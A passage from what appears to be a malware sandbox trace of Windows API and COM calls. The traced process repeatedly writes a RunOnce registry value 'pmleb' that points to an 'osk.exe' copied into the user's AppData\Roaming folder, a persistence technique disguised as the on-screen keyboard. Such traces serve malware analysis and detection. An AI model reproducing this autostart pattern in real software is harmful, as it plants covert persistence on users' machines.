This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.316] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0080.316] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.316] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x73 [0080.316] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.317] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x72 [0080.317] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.317] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.317] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.317] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.317] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.318] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.318] RegCloseKey (hKey=0x280) returned 0x0 [0080.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.318] SetTimer (hWnd=0x20280, nIDEvent=0x2072, uElapse=0xa, lpTimerFunc=0x0) returned 0x2072 [0080.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.330] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.330] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.330] KillTimer (hWnd=0x20280, uIDEvent=0x2072) returned 1 [0080.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.330] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.330] IUnknown:Release (This=0x787518) returned 0x1 [0080.331] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.331] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.331] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.331] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.331] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.331] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0080.331] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.331] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x74 [0080.331] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.332] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x73 [0080.332] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.332] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.333] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.333] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.333] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.333] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.333] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.333] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.333] RegCloseKey (hKey=0x280) returned 0x0 [0080.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.334] SetTimer (hWnd=0x20280, nIDEvent=0x2073, uElapse=0xa, lpTimerFunc=0x0) returned 0x2073 [0080.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.345] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.345] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.346] KillTimer (hWnd=0x20280, uIDEvent=0x2073) returned 1 [0080.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.346] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.346] IUnknown:Release (This=0x787518) returned 0x1 [0080.346] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.346] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.346] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.347] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.347] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.347] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0080.347] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.347] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x75 [0080.347] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.348] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x74 [0080.348] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.348] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.348] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.348] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.348] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.348] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.349] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.349] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.349] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.349] RegCloseKey (hKey=0x280) returned 0x0 [0080.349] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.349] SetTimer (hWnd=0x20280, nIDEvent=0x2074, uElapse=0xa, lpTimerFunc=0x0) returned 0x2074 [0080.349] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.361] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.361] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.361] KillTimer (hWnd=0x20280, uIDEvent=0x2074) returned 1 [0080.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.361] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.362] IUnknown:Release (This=0x787518) returned 0x1 [0080.362] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.362] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.362] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.362] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | 